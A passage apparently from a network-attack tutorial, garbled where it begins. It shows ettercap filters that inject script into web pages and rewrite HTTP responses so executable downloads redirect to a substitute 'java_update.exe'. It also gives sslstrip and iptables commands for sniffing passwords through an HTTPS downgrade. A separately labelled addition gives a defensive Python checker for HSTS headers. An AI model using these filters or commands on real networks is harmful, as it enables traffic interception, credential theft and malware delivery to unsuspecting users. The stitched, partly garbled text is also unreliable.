issue these commands to the GUI--【腳本alert('just for a test!');");alert('just for a test');");
msg("Filter run!...Exploit code injected ok!\n");
}
}
(4) Replace the URL
# replace rmccurdy with your website
# replace the url with what ever exe you like

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close");
   replace("Keep-Alive", "close");
}

if (ip.proto == TCP && search(DATA.data, ": application") ){
   # enable for logging log(DECODED.data, "/tmp/log.log");
   msg("found EXE\n");
   # "Win32" is the first part of the exe example:
   # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
   if (search(DATA.data, "Win32")) {
      msg("doing nothing\n");
   } else {
      replace("200 OK", "301 Moved Permanently Location: http://127.0.0.1/java_update.exe ");
      msg("redirect success\n");
   }
}
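0x03 SSL Password Sniffing
To sniff SSL traffic you can use the tool sslstrip. It works by downgrading all HTTPS traffic to HTTP. It acts as a man-in-the-middle: it establishes a normal HTTPS connection with the server, while using a plain HTTP connection with the browser. To use it, enable traffic forwarding on the local machine and redirect the HTTP traffic on port 80 to port 10000, then run sslstrip listening on port 10000: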
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sslstrip -l 10000
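The defence against the downgrade described above is HSTS (RFC 6797), which tells the browser to refuse plain HTTP for a site. The following is an added example, not part of the original tutorial: it parses a Strict-Transport-Security header and classifies how much protection a response gives. The function names, result labels and sample responses are assumptions made for illustration.

```python
PRELOAD_MIN_AGE = 31536000  # one year, the minimum hstspreload.org accepts

def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797); None if invalid."""
    directives = {}
    for part in value.split(";"):
        name, _, arg = part.strip().partition("=")
        name = name.strip().lower()          # directive names are case-insensitive
        if not name:
            continue                          # tolerate empty segments ("a;;b")
        if name in directives:
            return None                       # a repeated directive voids the header
        directives[name] = arg.strip().strip('"')   # max-age may be a quoted string
    age = directives.get("max-age", "")
    if not (age.isascii() and age.isdigit()):
        return None                           # max-age is the one required directive
    return {
        "max_age": int(age),
        "include_subdomains": "includesubdomains" in directives,
        "preload": "preload" in directives,
    }

def downgrade_exposure(scheme, headers):
    """Classify one response by how much it limits an HTTPS-to-HTTP downgrade."""
    if scheme != "https":
        # Browsers ignore HSTS sent over plain HTTP, and a man-in-the-middle
        # on that connection could remove the header anyway.
        return "ignored-over-http"
    raw = {k.lower(): v for k, v in headers.items()}.get("strict-transport-security")
    policy = parse_hsts(raw) if raw else None
    if policy is None or policy["max_age"] == 0:
        return "exposed"                      # no policy, broken policy, or policy cleared
    if (policy["preload"] and policy["include_subdomains"]
            and policy["max_age"] >= PRELOAD_MIN_AGE):
        return "preload-ready"                # eligible for browser preload lists
    return "protected-after-first-visit"      # first plain-HTTP request is still strippable

# Constructed sample responses (not captured from any real site).
SAMPLES = [
    ("http",  {"Strict-Transport-Security": "max-age=31536000"}),
    ("https", {"Content-Type": "text/html"}),
    ("https", {"strict-transport-security": "max-age=0"}),
    ("https", {"Strict-Transport-Security": 'max-age="86400"'}),
    ("https", {"Strict-Transport-Security":
               "max-age=63072000; includeSubDomains; preload"}),
]

if __name__ == "__main__":
    for scheme, headers in SAMPLES:
        print(scheme, headers, "->", downgrade_exposure(scheme, headers))
```

A site that only reaches "protected-after-first-visit" still depends on the user's first connection not being intercepted; submitting a "preload-ready" policy to the browser preload list closes that gap.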